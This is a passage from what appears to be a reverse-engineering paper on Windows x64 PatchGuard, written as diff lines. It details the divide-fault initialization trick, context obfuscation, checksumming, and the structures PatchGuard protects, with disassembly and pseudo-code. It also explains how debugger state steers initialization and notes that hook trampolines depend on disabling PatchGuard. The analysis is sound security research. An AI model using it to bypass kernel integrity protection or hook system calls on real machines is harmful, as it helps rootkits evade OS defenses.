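+instruction in nt!KiDivide6432 uses a 32-bit divisor and raises a divide
+error fault when the quotient overflows 32 bits:
+
+
+#include <stdio.h>
+#include <stdint.h>
+
+int main(void)
+{
+    /* nt!KdDebuggerNotPresent overlaps the high-order byte of
+       nt!KiTestDividend, so clearing it also changes the dividend. */
+    uint64_t no_debugger = 0x014b5fa3a053724cULL; /* KdDebuggerNotPresent == 1 */
+    uint64_t debugger    = 0x004b5fa3a053724cULL; /* KdDebuggerNotPresent == 0 */
+    uint32_t divisor     = 0xcb5fa3;
+
+    /* 0x1a11f49ae: too large for 32 bits, so the real div instruction
+       faults and the fault handler winds up initializing PatchGuard. */
+    printf("no debugger: quotient = 0x%llx\n",
+           (unsigned long long)(no_debugger / divisor));
+
+    /* 0x5ee0b7e5: fits in 32 bits, so nt!KeInitSystem's comparison succeeds
+       and PatchGuard is never initialized. */
+    printf("debugger:    quotient = 0x%llx\n",
+           (unsigned long long)(debugger / divisor));
+
+    return 0;
+}
+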
+
+With the unioned aspect of nt!KiTestDividend understood, the next step is to
+understand how the divide error fault actually leads to the initialization
+of the PatchGuard subsystem. For this aspect it is necessary to start at the
+place where all divide error faults go: nt!KiDivideErrorFault.
+
+The indirect triggering of nt!KiDivideErrorFault leads to a series of
+function calls that eventually result in nt!KiOpDiv being called to handle
+the divide error fault for the div instruction. The nt!KiOpDiv routine
+appears to be responsible for preprocessing the different kinds of divide
+errors, like divide by zero. Although it may look normal at first glance,
+nt!KiOpDiv also has a darker side. The stack trace that leads to the calling
+of nt!KiOpDiv is shown below. For those curious as to how the authors were
+able to debug the PatchGuard initialization vector that is intended to be
+disabled when a debugger is attached, one method is to simply break on the
+div instruction in nt!KiDivide6432 and change r8d to zero. This will
+generate the divide error fault and lead to the calling of the PatchGuard
+initialization routines. In order to allow the machine to boot normally, a
+breakpoint must be set on nt!KiDivide6432 after the fact to automatically
+restore r8d to 0xcb5fa3:
+
+
+kd> k
+Child-SP          RetAddr           Call Site
+fffffadf`e4a15f90 fffff800`010144d4 nt!KiOp_Div+0x29
+fffffadf`e4a15fe0 fffff800`01058d75 nt!KiPreprocessFault+0xc7
+fffffadf`e4a16080 fffff800`0104172f nt!KiDispatchException+0x85
+fffffadf`e4a16680 fffff800`0103f5b7 nt!KiExceptionExit
+fffffadf`e4a16800 fffff800`0142132b nt!KiDivideErrorFault+0xb7
+fffffadf`e4a16998 fffff800`014212d3 nt!KiDivide6432+0xb
+fffffadf`e4a169a0 fffff800`0142a226 nt!KeInitSystem+0x169
+fffffadf`e4a16a50 fffff800`01243e09 nt!Phase1InitializationDiscard+0x93e
+fffffadf`e4a16d40 fffff800`012b226e nt!Phase1Initialization+0x9
+fffffadf`e4a16d70 fffff800`01044416 nt!PspSystemThreadStartup+0x3e
+fffffadf`e4a16dd0 00000000`00000000 nt!KxStartSystemThread+0x16
+
+
+The first thing that nt!KiOpDiv does prior to processing the actual divide
+fault is to call a function named nt!KiFilterFiberContext. This function
+seems oddly named, not only in the general sense but also in the specific
+context of a routine that is intended to be dealing with divide faults. By
+looking at the body of nt!KiFilterFiberContext, its intentions quickly
+become clear:
+
+
+nt!KiFilterFiberContext:
+fffff800`01003ac2 53               push rbx
+fffff800`01003ac3 4883ec20         sub rsp,0x20
+fffff800`01003ac7 488d0552d84100   lea rax,[nt!KiDivide6432]
+fffff800`01003ace 488bd9           mov rbx,rcx
+fffff800`01003ad1 4883c00b         add rax,0xb
+fffff800`01003ad5 483981f8000000   cmp [rcx+0xf8],rax
+fffff800`01003adc 0f855d380c00     jne nt!KiFilterFiberContext+0x1d
+fffff800`01003ae2 e899fa4100       call nt!KiDivide6432+0x570
+
+
+It appears that this chunk of code is designed to see if the address at
+which the fault occurred is equal to nt!KiDivide6432 + 0xb. 
If one adds 0xb to nt!KiDivide6432 and disassembles the instruction at that
+address, the result is:
+
+
+nt!KiDivide6432+0xb:
+fffff800`0142132b 41f7f0           div r8d
+
+
+This coincides with what one would expect when the quotient overflow
+condition occurs. According to the disassembly above, if the fault address
+is equal to nt!KiDivide6432 + 0xb, then an unnamed symbol is called at
+nt!KiDivide6432 + 0x570. This unnamed symbol will henceforth be referred to
+as nt!KiInitializePatchGuard, and it is what drives the setup of the
+PatchGuard subsystem.
+
+The nt!KiInitializePatchGuard routine itself is quite large. It handles the
+initialization of the contexts that will monitor certain system images, the
+SSDT, the processor GDT/IDT, certain critical MSRs, and certain
+debugger-related routines. The very first thing that the initialization
+routine does is to check to see if the machine is being booted in safe mode.
+If it is being booted in safe mode, the PatchGuard subsystem will not be
+enabled, as shown below:
+
+
+nt!KiDivide6432+0x570:
+fffff800`01423580 4881ecd8020000   sub rsp,0x2d8
+fffff800`01423587 833d22dfd7ff00   cmp dword ptr [nt!InitSafeBootMode],0x0
+fffff800`0142358e 0f8504770000     jne nt!KiDivide6432+0x580
+
+...
+
+nt!KiDivide6432+0x580:
+fffff800`0142ac98 b001             mov al,0x1
+fffff800`0142ac9a 4881c4d8020000   add rsp,0x2d8
+fffff800`0142aca1 c3               ret
+
+
+Once the safe mode check has passed, nt!KiInitializePatchGuard begins the
+PatchGuard initialization by calculating the size of the INITKDBG section in
+ntoskrnl.exe. It accomplishes this by passing the address of a symbol found
+within that section, nt!FsRtlUninitializeSmallMcb, to nt!RtlPcToFileHeader.
+This routine passes back the base address of nt in an output parameter that
+is subsequently passed to nt!RtlImageNtHeader, which returns a pointer to
+the image's IMAGE_NT_HEADERS structure. From there, the RVA of
+nt!FsRtlUninitializeSmallMcb is calculated by subtracting the base address
+of nt from the symbol's address. The calculated RVA is then passed to
+nt!RtlSectionTableFromVirtualAddress, which returns a pointer to the image
+section that nt!FsRtlUninitializeSmallMcb resides in. The debugger output
+below shows what rax points to after obtaining the image section structure:
+
+
+kd> ? rax
+Evaluate expression: -8796076244456 = fffff800`01000218
+kd> dt nt!_IMAGE_SECTION_HEADER fffff800`01000218
++0x000 Name : [8] "INITKDBG"
++0x008 Misc :
++0x00c VirtualAddress : 0x165000
++0x010 SizeOfRawData : 0x2600
++0x014 PointerToRawData : 0x163a00
++0x018 PointerToRelocations : 0
++0x01c PointerToLinenumbers : 0
++0x020 NumberOfRelocations : 0
++0x022 NumberOfLinenumbers : 0
++0x024 Characteristics : 0x68000020
+
+
+The whole reason behind this initial image section lookup has to do with one
+of the ways in which PatchGuard obfuscates and hides the code that it
+executes. In this case, code within the INITKDBG section will eventually be
+copied into an allocated protection context that will be used during the
+validation phase. The reason that this is necessary will be discussed in
+more detail later.
+
+After collecting information about the INITKDBG image section, the
+PatchGuard initialization routine performs the first of many pseudo-random
+number generations. 
This code can be seen throughout the +PatchGuard functions and has a form that is similar to the code shown +below: + + +fffff800`0142362d 0f31 rdtsc +fffff800`0142362f 488bac24d8020000 mov rbp,[rsp+0x2d8] +fffff800`01423637 48c1e220 shl rdx,0x20 +fffff800`0142363b 49bf0120000480001070 mov r15,0x7010008004002001 +fffff800`01423645 480bc2 or rax,rdx +fffff800`01423648 488bcd mov rcx,rbp +fffff800`0142364b 4833c8 xor rcx,rax +fffff800`0142364e 488d442478 lea rax,[rsp+0x78] +fffff800`01423653 4833c8 xor rcx,rax +fffff800`01423656 488bc1 mov rax,rcx +fffff800`01423659 48c1c803 ror rax,0x3 +fffff800`0142365d 4833c8 xor rcx,rax +fffff800`01423660 498bc7 mov rax,r15 +fffff800`01423663 48f7e1 mul rcx +fffff800`01423666 4889442478 mov [rsp+0x78],rax +fffff800`0142366b 488bca mov rcx,rdx +fffff800`0142366e 4889942488000000 mov [rsp+0x88],rdx +fffff800`01423676 4833c8 xor rcx,rax +fffff800`01423679 48b88fe3388ee3388ee3 mov rax,0xe38e38e38e38e38f +fffff800`01423683 48f7e1 mul rcx +fffff800`01423686 48c1ea03 shr rdx,0x3 +fffff800`0142368a 488d04d2 lea rax,[rdx+rdx*8] +fffff800`0142368e 482bc8 sub rcx,rax +fffff800`01423691 8bc1 mov eax,ecx + + +This pseudo-random number generator uses the rdtsc instruction as a seed +and then proceeds to perform various bitwise and multiplication +operations until the end result is produced in eax. The result of this +first random number generator is used to index an array of pool tags +that are used for PatchGuard memory allocations. This is an example of +one of the many ways in which PatchGuard attempts to make it harder to +find its own internal data structures in memory. In this case, it adopts +a random legitimate pool tag in an effort to blend in with other memory +allocations. The code block below shows how the pool tag array is +indexed and where it can be found in memory: + + +fffff800`01423693 488d0d66c9bdff lea rcx,[nt] +fffff800`0142369a 448b848100044300 mov r8d,[rcx+rax*4+0x430400] + + +In this case, the random number is stored in the rax register which is +used to index the array of pool tags found at nt+0x430400. The fact +that the array is referenced indirectly might be seen as another attempt +at obfuscation in a bid to make what is occurring less obvious at a +glance. If the pool tag array address is dumped in the debugger, all of +the pool tags that could possibly be used by PatchGuard can be seen: + + +lkd> db nt+0x430400 +41 63 70 53 46 69 6c 65-49 70 46 49 49 72 70 20 AcpSFileIpFIIrp +4d 75 74 61 4e 74 46 73-4e 74 72 66 53 65 6d 61 MutaNtFsNtrfSema +54 43 50 63 00 00 00 00-10 3b 03 01 00 f8 ff ff TCPc.....;...... + + +After the fake pool tag has been selected from the array at random, +the PatchGuard initialization routine proceeds by allocating a random +amount of storage that is bounded at a minimum by the virtual size of +the INITKDBG section plus 0x1b8 and at a maximum by the minimum plus +0x7ff. The magic value 0x1b8 that is expressed in the minimum size is +actually the size of the data structure that is used by PatchGuard to +store context-specific protection information, as will be shown later. +The fake pool tag and the random size are then used to allocate storage +from the NonPagedPool as shown in the pseudo-code below: + + +Context = ExAllocatePoolWithTag( + NonPagedPool, + (InitKdbgSection->VirtualSize + 0x1b8) + (RandSize & 0x7ff), + PoolTagArray[RandomPoolTagIndex]); + + +If the allocation of the context succeeds, the initialization routine +zeroes its contents and then starts initializing some of the structure's +attributes. 
The context returned by the allocation will henceforth be
+referred to as a structure of type PATCHGUARD_CONTEXT. The first 0x48 bytes
+of the structure are actually composed of code that is copied from the
+misleading symbol named nt!CmpAppendDllSection. This function is actually
+used to decrypt the structure at runtime, as will be seen later. After
+nt!CmpAppendDllSection is copied to the first 0x48 bytes of the data
+structure, the initialization routine sets up a number of function pointers
+that are stored within the structure. The routines whose addresses it
+stores, and their offsets within the PatchGuard context data structure, are
+shown below.
+
+
+ +--------+-------------------------------------------+
+ | Offset | Symbol                                    |
+ +--------+-------------------------------------------+
+ | 0x48   | nt!ExAcquireResourceSharedLite            |
+ | 0x50   | nt!ExAllocatePoolWithTag                  |
+ | 0x58   | nt!ExFreePool                             |
+ | 0x60   | nt!ExMapHandleToPointer                   |
+ | 0x68   | nt!ExQueueWorkItem                        |
+ | 0x70   | nt!ExReleaseResourceLite                  |
+ | 0x78   | nt!ExUnlockHandleTableEntry               |
+ | 0x80   | nt!ExAcquireGuardedMutex                  |
+ | 0x88   | nt!ObDereferenceObjectEx                  |
+ | 0x90   | nt!KeBugCheckEx                           |
+ | 0x98   | nt!KeInitializeDpc                        |
+ | 0xa0   | nt!KeLeaveCriticalRegion                  |
+ | 0xa8   | nt!KeReleaseGuardedMutex                  |
+ | 0xb0   | nt!ObDereferenceObjectEx2                 |
+ | 0xb8   | nt!KeSetAffinityThread                    |
+ | 0xc0   | nt!KeSetTimer                             |
+ | 0xc8   | nt!RtlImageDirectoryEntryToData           |
+ | 0xd0   | nt!RtlImageNtHeaders                      |
+ | 0xd8   | nt!RtlLookupFunctionEntry                 |
+ | 0xe0   | nt!RtlSectionTableFromVirtualAddress      |
+ | 0xe8   | nt!KiOpPrefetchPatchCount                 |
+ | 0xf0   | nt!KiProcessListHead                      |
+ | 0xf8   | nt!KiProcessListLock                      |
+ | 0x100  | nt!PsActiveProcessHead                    |
+ | 0x108  | nt!PsLoadedModuleList                     |
+ | 0x110  | nt!PsLoadedModuleResource                 |
+ | 0x118  | nt!PspActiveProcessMutex                  |
+ | 0x120  | nt!PspCidTable                            |
+ +--------+-------------------------------------------+
+
+ PATCHGUARD_CONTEXT function pointers
+
+
+The reason that PatchGuard uses function pointers instead of calling the
+symbols directly is most likely due to the relative addressing mode used in
+x64. Since the PatchGuard code runs dynamically from unpredictable
+addresses, it would be impossible to use the relative addressing mode
+without having to fix up instructions -- a task that would no doubt be
+painful and not really worth the trouble. The authors do not see any
+particular advantage gained in terms of obfuscation by the use of function
+pointers stored in the PatchGuard context structure.
+
+After all of the function pointers have been set up, the initialization
+routine proceeds by picking another random pool tag that is used for
+subsequent allocations and stores it at offset 0x188 within the PatchGuard
+context structure. After that, two more random numbers are generated, both
+of which are used later on during the encryption phase of the structure. One
+is used as a random number of rotate bits, the other is used as an XOR seed.
+The XOR seed is stored at offset 0x190 and the random rotate bits value is
+stored at offset 0x18c.
+
+The next step taken by the initialization routine is to acquire the number
+of bits that can be used to represent the virtual address space by querying
+the processor via the cpuid ExtendedAddressSize (0x80000008) extended
+function. The result is stored at offset 0x1b4 within the PatchGuard context
+structure. 
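+
+For reference, extended function 0x80000008 returns the supported physical
+address width in bits [7:0] of eax and the supported virtual (linear)
+address width in bits [15:8]. A minimal sketch of the query using the
+__cpuid compiler intrinsic is shown below; this is an illustration of the
+cpuid leaf, not PatchGuard's code:
+
+
+#include <intrin.h>
+
+/* Query the virtual address width via cpuid ExtendedAddressSize
+   (0x80000008). Bits [15:8] of eax hold the linear address width and bits
+   [7:0] hold the physical address width. */
+unsigned QueryVirtualAddressBits(void)
+{
+    int Regs[4]; /* eax, ebx, ecx, edx */
+
+    __cpuid(Regs, 0x80000008);
+
+    return (Regs[0] >> 8) & 0xff;
+}
+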
+ +Finally, the last major step before initializing the individual +protection sub-contexts is the copying of the contents of the INITKDBG +section to the allocated PatchGuard context structure. The copy +operation looks something like the pseudo code below: + + +memmove( + (PCHAR)PatchGuardContext + sizeof(PATCHGUARD_CONTEXT), + NtImageBase + InitKdbgSection->VirtualAddress, + InitKdbgSection->VirtualSize); + + +With the primary portions of the PatchGuard context structure +initialized, the next logical step is to initialize the sub-contexts +that are specific to the things that are actually being protected. + +3.2) Protected Structure Initialization + + +The structures that PatchGuard protects are represented by individual +sub-context structures. These structures are composed at the beginning +by the contents of the parent PatchGuard structure (PATCHGUARD_CONTEXT). +This includes the function pointers and other values assigned to the +parent. The sub-contexts are identified by general types that provide +the validation routine with something to key off of. + +This section will explain how each of the individual structures have +their protection sub-contexts initialized. At the time of this writing, +the structures have their protection sub-contexts initialized in the +order described below: + + + - System images + - SSDT + - GDT/IDT/MSRs + - Debug routines + + +After all the sub-contexts have been initialized, the parent protection +context is XOR'd and a timer is initialized and set. The purpose of +this timer, as will be shown, is to run the validation half of the +PatchGuard subsystem on the data that is collected. Aside from the +specific protection sub-contexts listed in the following subsections, it +was observed by the authors that the routine that initializes the +PatchGuard subsystem also allocated sub-context structures of types that +could not be immediately discerned. In particular, these types had the +sub-context identifiers of 0x4 and 0x5. + +3.2.1) System Images + + +The protection of certain key kernel images is one of the more critical +aspects of PatchGuard's protection schemes. If a driver were still able +to hook functions in nt, ndis, or any other key kernel components, then +PatchGuard would be mostly irrelevant. In order to address this +concern, PatchGuard performs a set of operations that are intended to +ensure that system images cannot be tampered with. The table in figure +shows which kernel images are currently protected by this scheme. + + + +--------------+ + | Image Name | + +--------------+ + | ntoskrnl.exe | + | hal.dll | + | ndis.sys | + +--------------+ + + Protected kernel images + + +The approach taken to protect each of these images is the same. To kick +things off, the address of a symbol that resides within the image is +passed to a PatchGuard sub-routine that will be referred to as +nt!PgCreateImageSubContext. This routine is prototyped as shown below: + + +NTSTATUS PgCreateImageSubContext( + IN PPATCHGUARD_CONTEXT ParentContext, + IN LPVOID SymbolAddress); + + +For ntoskrnl.exe, the address of nt!KiFilterFiberContext is passed in as +the symbol address. For hal.dll, the address of HalInitializeProcessor +is passed. Finally, the address passed for ndis.sys is its entry point +address which is obtained through a call to nt!GetModuleEntryPoint. + +Inside nt!PgCreateImageSubContext, the basic approach taken to protect +the images is through the generation of a few distinct PatchGuard +sub-contexts. 
The first sub-context is designed to hold the checksum of
+an individual image's sections, with a few exceptions. The second and third
+sub-contexts hold the checksum of an image's Import Address Table (IAT) and
+Import Directory, respectively. These routines all make use of a shared
+routine that is responsible for generating a protection sub-context that
+holds the checksum for a block of memory using the random XOR key and random
+rotate bits stored in the parent PatchGuard context structure. The prototype
+for this routine is shown below:
+
+
+typedef struct BLOCK_CHECKSUM_STATE
+{
+    ULONG   Unknown;
+    ULONG64 BaseAddress;
+    ULONG   BlockSize;
+    ULONG   Checksum;
+} BLOCK_CHECKSUM_STATE, *PBLOCK_CHECKSUM_STATE;
+
+PPATCHGUARD_SUB_CONTEXT PgCreateBlockChecksumSubContext(
+    IN PPATCHGUARD_CONTEXT Context,
+    IN ULONG Unknown,
+    IN PVOID BlockAddress,
+    IN ULONG BlockSize,
+    IN ULONG SubContextSize,
+    OUT PBLOCK_CHECKSUM_STATE ChecksumState OPTIONAL);
+
+
+The block checksum sub-context stores the checksum state at the end of the
+PATCHGUARD_CONTEXT. The checksum state is stored in a BLOCK_CHECKSUM_STATE
+structure. The Unknown attribute of the structure is initialized to the
+Unknown parameter from nt!PgCreateBlockChecksumSubContext. The purpose of
+this field was not deduced, but the value was zero in the cases observed
+during debugging.
+
+The checksum algorithm used by the routine is fairly simple. The pseudo-code
+below shows how it works conceptually:
+
+
+ULONG64 Checksum = Context->RandomHashXorSeed;
+ULONG   Checksum32;
+
+// Checksum 64-bit blocks
+while (BlockSize >= sizeof(ULONG64))
+{
+    Checksum    ^= *(PULONG64)BaseAddress;
+    Checksum     = RotateLeft(Checksum, Context->RandomHashRotateBits);
+    BlockSize   -= sizeof(ULONG64);
+    BaseAddress += sizeof(ULONG64);
+}
+
+// Checksum any remaining bytes
+while (BlockSize-- > 0)
+{
+    Checksum ^= *(PUCHAR)BaseAddress;
+    Checksum  = RotateLeft(Checksum, Context->RandomHashRotateBits);
+    BaseAddress++;
+}
+
+Checksum32 = (ULONG)Checksum;
+
+Checksum >>= 31;
+
+do
+{
+    Checksum32 ^= (ULONG)Checksum;
+    Checksum  >>= 31;
+} while (Checksum);
+
+
+The end result is that Checksum32 holds the checksum of the block, which is
+subsequently stored in the Checksum attribute of the checksum state
+structure along with the original block size and block base address that
+were passed to the function.
+
+For the purpose of initializing the checksum of image sections,
+nt!PgCreateImageSubContext calls into nt!PgCreateImageSectionSubContext,
+which is prototyped as:
+
+
+PPATCHGUARD_SUB_CONTEXT PgCreateImageSectionSubContext(
+    IN PPATCHGUARD_CONTEXT ParentContext,
+    IN PVOID SymbolAddress,
+    IN ULONG SubContextSize,
+    IN PVOID ImageBase);
+
+
+This routine first checks to see if nt!KiOpPrefetchPatchCount is zero. If it
+is not, a block checksum context is created that does not cover all of the
+sections in the image. This could presumably be related to detecting whether
+or not hot patches have been applied, but this has not been confirmed.
+Otherwise, the function appears to enumerate the various sections included
+in the supplied image, calculating the checksum across each. It appears to
+exclude checksums of sections named INIT, PAGEVRFY, PAGESPEC, and PAGEKD.
+
+To account for an image's Import Address Table and Import Directory,
+nt!PgCreateImageSubContext calls nt!PgCreateBlockChecksumSubContext on the
+directory entries for both, but only if the directory entries exist and are
+valid for the supplied image. 
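+
+The RotateLeft helper used in the pseudo-code is not spelled out in the
+text. For completeness, a self-contained C version of the same checksum
+might look like the following; the parameter names mirror the labels used in
+this document rather than anything taken from the actual binary:
+
+
+#include <stdint.h>
+#include <stddef.h>
+#include <string.h>
+
+static uint64_t RotateLeft64(uint64_t Value, unsigned Bits)
+{
+    Bits &= 63;
+    return (Value << Bits) | (Value >> ((64 - Bits) & 63));
+}
+
+/* Self-contained version of the block checksum described above. XorSeed and
+   RotateBits stand in for the random values stored at offsets 0x190 and
+   0x18c of the PatchGuard context. */
+uint32_t PgBlockChecksum(const void *Base, size_t Size,
+                         uint64_t XorSeed, unsigned RotateBits)
+{
+    const uint8_t *p = (const uint8_t *)Base;
+    uint64_t Checksum = XorSeed;
+    uint32_t Checksum32;
+
+    /* Checksum 64-bit blocks first... */
+    while (Size >= sizeof(uint64_t))
+    {
+        uint64_t Block;
+        memcpy(&Block, p, sizeof(Block));
+        Checksum = RotateLeft64(Checksum ^ Block, RotateBits);
+        Size -= sizeof(uint64_t);
+        p += sizeof(uint64_t);
+    }
+
+    /* ...then any remaining bytes. */
+    while (Size-- > 0)
+        Checksum = RotateLeft64(Checksum ^ *p++, RotateBits);
+
+    /* Fold the 64-bit state down to a 32-bit checksum. */
+    Checksum32 = (uint32_t)Checksum;
+    Checksum >>= 31;
+    do
+    {
+        Checksum32 ^= (uint32_t)Checksum;
+        Checksum >>= 31;
+    } while (Checksum);
+
+    return Checksum32;
+}
+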
+
+
+3.2.2) GDT/IDT
+
+
+The protection of the Global Descriptor Table (GDT) and the Interrupt
+Descriptor Table (IDT) is another important feature of PatchGuard. The GDT
+is used to describe memory segments that are used by the kernel. It is
+especially lucrative to malicious applications due to the fact that
+modifying certain key GDT entries could lead to non-privileged, user-mode
+applications being able to modify kernel memory. The IDT is also useful,
+both in a malicious context and in a legitimate context. In some cases,
+third parties may wish to intercept certain hardware or software interrupts
+before passing them off to the kernel. Unless done right, hooking IDT
+entries can be very dangerous due to the considerations that have to be made
+when running in the context of an interrupt request handler.
+
+The actual implementation of GDT/IDT protection is accomplished through the
+use of the nt!PgCreateBlockChecksumSubContext function, which is passed the
+contents of both descriptor tables. Since the registers that hold the GDT
+and IDT are specific to a given processor, PatchGuard creates a separate
+context for each table on each individual processor. To obtain the address
+of the GDT and the IDT for a given processor, PatchGuard first uses
+nt!KeSetAffinityThread to ensure that it's running on a specific processor.
+After that, it makes a call to nt!KiGetGdtIdt, which stores the GDT and the
+IDT base addresses as output parameters as shown in the prototype below:
+
+
+VOID KiGetGdtIdt(
+    OUT PVOID *Gdt,
+    OUT PVOID *Idt);
+
+
+The actual protection of the GDT and the IDT is done in the context of two
+separate functions that have been labeled nt!PgCreateGdtSubContext and
+nt!PgCreateIdtSubContext. These routines are prototyped as shown below:
+
+
+PPATCHGUARD_SUB_CONTEXT PgCreateGdtSubContext(
+    IN PPATCHGUARD_CONTEXT ParentContext,
+    IN UCHAR ProcessorNumber);
+
+PPATCHGUARD_SUB_CONTEXT PgCreateIdtSubContext(
+    IN PPATCHGUARD_CONTEXT ParentContext,
+    IN UCHAR ProcessorNumber);
+
+
+Both routines are called in the context of a loop that iterates across all
+of the processors on the machine with respect to nt!KeNumberProcessors.
+
+3.2.3) SSDT
+
+
+One of the areas most notorious for being hooked by third-party drivers is
+the System Service Descriptor Table, also known as the SSDT. This table
+contains information about the service tables that are used by the operating
+system for dispatching system calls. On Windows x64 kernels,
+nt!KeServiceDescriptorTable conveys the address of the actual dispatch table
+and the number of entries in the dispatch table for the native system call
+interface. In this case, the actual dispatch table is stored as an array of
+relative offsets in nt!KiServiceTable. The offsets are relative to the base
+of the array itself. To obtain the absolute address of a system service
+routine, the following approach can be used:
+
+
+lkd> u dwo(nt!KiServiceTable)+nt!KiServiceTable L1
+nt!NtMapUserPhysicalPagesScatter:
+fffff800`013728b0 488bc4           mov rax,rsp
+lkd> u dwo(nt!KiServiceTable+4)+nt!KiServiceTable L1
+nt!NtWaitForSingleObject:
+fffff800`012b83a0 4c89442418       mov [rsp+0x18],r8
+
+
+The fact that the dispatch table now contains an array of relative addresses
+is one hurdle that driver developers who intend to port system call hooking
+code from 32-bit platforms to the x64 kernel will have to overcome. One
+solution to the relative address problem is fairly simple. 
There are plenty of places within the 2 GB of relatively
+addressable memory in which a trampoline could be placed for a hook routine.
+For instance, there is often alignment padding between symbols. This
+approach is rather hackish and it depends on the fact that PatchGuard is
+forcibly disabled. However, there are also other, more elegant approaches to
+accomplishing this that require neither.
+
+As far as protecting the system service table is concerned, PatchGuard
+protects both the native system service dispatch table stored in
+nt!KiServiceTable as well as the nt!KeServiceDescriptorTable structure
+itself. This is done by making use of the nt!PgCreateBlockChecksumSubContext
+routine that was mentioned in the section on system images (section 3.2.1).
+The following code shows how the block checksum routine is called for both
+items:
+
+
+PgCreateBlockChecksumSubContext(
+    ParentContext,
+    0,
+    KeServiceDescriptorTable->DispatchTable, // KiServiceTable
+    KiServiceLimit * sizeof(ULONG),
+    0,
+    NULL);
+
+PgCreateBlockChecksumSubContext(
+    ParentContext,
+    0,
+    &KeServiceDescriptorTable,
+    0x20,
+    0,
+    NULL);
+
+
+The reason the nt!KeServiceDescriptorTable structure is also protected is to
+prevent the modification of the attribute that points to the actual dispatch
+table.
+
+3.2.4) Processor MSRs
+
+
+The latest and greatest processors have greatly improved the methods through
+which user-mode to kernel-mode transitions are accomplished. Prior to these
+enhancements, most operating systems, including Windows, were forced to
+dedicate a soft-interrupt for exclusive use as a system call vector. Newer
+processors have dedicated instructions for dispatching system calls, such as
+syscall and sysenter. Part of the way in which these instructions work is by
+taking advantage of a processor-defined model-specific register (MSR) that
+contains the address of the routine that is intended to gain control in
+kernel-mode when a system call is received. On the x64 architecture, the MSR
+that controls this value is named LSTAR, which is short for Long System
+Target-Address Register. The code associated with this MSR is 0xc0000082.
+During boot, the x64 kernel initializes this MSR to nt!KiSystemCall64.
+
+To prevent third parties from hooking system calls by changing the value of
+the LSTAR MSR, PatchGuard creates a protection sub-context of type 7 that
+caches the value of the MSR. The routine that is responsible for
+accomplishing this has been labeled PgCreateMsrSubContext and its prototype
+is shown below:
+
+
+PPATCHGUARD_SUB_CONTEXT PgCreateMsrSubContext(
+    IN PPATCHGUARD_CONTEXT ParentContext,
+    IN UCHAR Processor);
+
+
+Like the GDT/IDT protection, the LSTAR MSR value must be obtained on a
+per-processor basis since MSR values are inherently stored on individual
+processors. To support this, the routine is called in the context of a loop
+through all of the processors and is passed the processor identifier that it
+is to read from. In order to ensure that the MSR value is obtained from the
+right processor, PatchGuard makes use of nt!KeSetAffinityThread to cause the
+calling thread to run on the appropriate processor.
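+
+For reference, a driver-side sketch of the same per-processor capture is
+shown below. It uses the documented affinity routines and the __readmsr
+compiler intrinsic rather than PatchGuard's internal helpers, and is only an
+illustration of the approach described above:
+
+
+#include <ntddk.h>
+#include <intrin.h>
+
+#define IA32_LSTAR 0xc0000082
+
+/* Capture the LSTAR MSR on each processor by binding the current thread to
+   one processor at a time. */
+VOID CaptureLstarPerProcessor(ULONG64 *Values, CCHAR ProcessorCount)
+{
+    CCHAR i;
+
+    for (i = 0; i < ProcessorCount; i++)
+    {
+        KeSetSystemAffinityThread((KAFFINITY)1 << i);
+        Values[i] = __readmsr(IA32_LSTAR);
+    }
+
+    KeRevertToUserAffinityThread();
+}
+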
These routines, such as nt!KdpStub, are intended to be used
+as a mechanism by which an attached debugger can handle an exception
+prior to allowing the kernel to dispatch it.  nt!KdpStub is called
+indirectly through the nt!KiDebugRoutine global variable from
+nt!KiDispatchException.  The routine that initializes the protection
+sub-context for these routines has been labeled
+nt!PgCreateDebugRoutineSubContext and is prototyped as shown below:
+
+
+PPATCHGUARD_SUB_CONTEXT PgCreateDebugRoutineSubContext(
+    IN PPATCHGUARD_CONTEXT ParentContext);
+
+
+It appears that the sub-context structure is initialized with pointers
+to nt!KdpStub, nt!KdpTrap, and nt!KiDebugRoutine.  It seems that this
+sub-context is intended to protect against a third-party driver
+modifying nt!KiDebugRoutine to point elsewhere.  There may be other
+intentions as well.
+
+3.3) Obfuscating the PatchGuard Contexts
+
+
+In order to make it more challenging to locate the PatchGuard contexts
+in memory, each context is XOR'd with a randomly generated 64-bit key.
+This is accomplished by calling the function that has been labeled
+nt!PgEncryptContext, which XOR's the supplied context buffer in place
+and then returns the XOR key that was used to encrypt it.  This function
+is prototyped as shown below:
+
+
+ULONG64 PgEncryptContext(
+    IN OUT PPATCHGUARD_CONTEXT Context);
+
+
+After nt!KiInitializePatchGuard has initialized all of the individual
+sub-contexts, the next thing that it does is encrypt the primary
+PatchGuard context.  To accomplish this, it first makes a copy of the
+context on the stack so that it can be referenced in plain-text after
+being encrypted.  The reason the plain-text copy is needed is so that
+the verification routine can be queued for execution, and in order to do
+that it is necessary to reference some of the attributes of the context
+structure.  This is discussed more in the following section.  After the
+copy has been created, a call is made to nt!PgEncryptContext passing the
+primary PatchGuard context as the first argument.  Once the verification
+routine has been queued for execution, the plain-text copy is no longer
+needed and is set back to zero in order to ensure that no reference is
+left in the clear.  The pseudo code below illustrates this behavior:
+
+
+PATCHGUARD_CONTEXT LocalCopy;
+ULONG64 XorKey;
+
+memmove(
+    &LocalCopy,
+    Context,
+    sizeof(PATCHGUARD_CONTEXT)); // 0x1b8
+
+XorKey = PgEncryptContext(
+    Context);
+
+... Use LocalCopy for verification routine queuing ...
+
+memset(
+    &LocalCopy,
+    0,
+    sizeof(LocalCopy));
+
+
+3.4) Executing the PatchGuard Verification Routine
+
+
+Gathering the checksums and caching critical structure values is great,
+but it means absolutely nothing if there is no means by which it can be
+validated.  To that end, PatchGuard goes to great lengths to make the
+execution of the validation routine as covert as possible.  This is
+accomplished through the use of misdirection and obfuscation.
+
+After all of the sub-contexts have been initialized, but prior to
+encrypting the primary context, nt!KiInitializePatchGuard performs one
+of its more critical operations.  In this phase, the routine that will
+be indirectly used to handle the PatchGuard verification is selected at
+random from an array of function pointers and is stored at offset 0x168
+in the primary PatchGuard context.  The functions found within the array
+have a very special purpose that will be discussed in more detail later
+in this section.
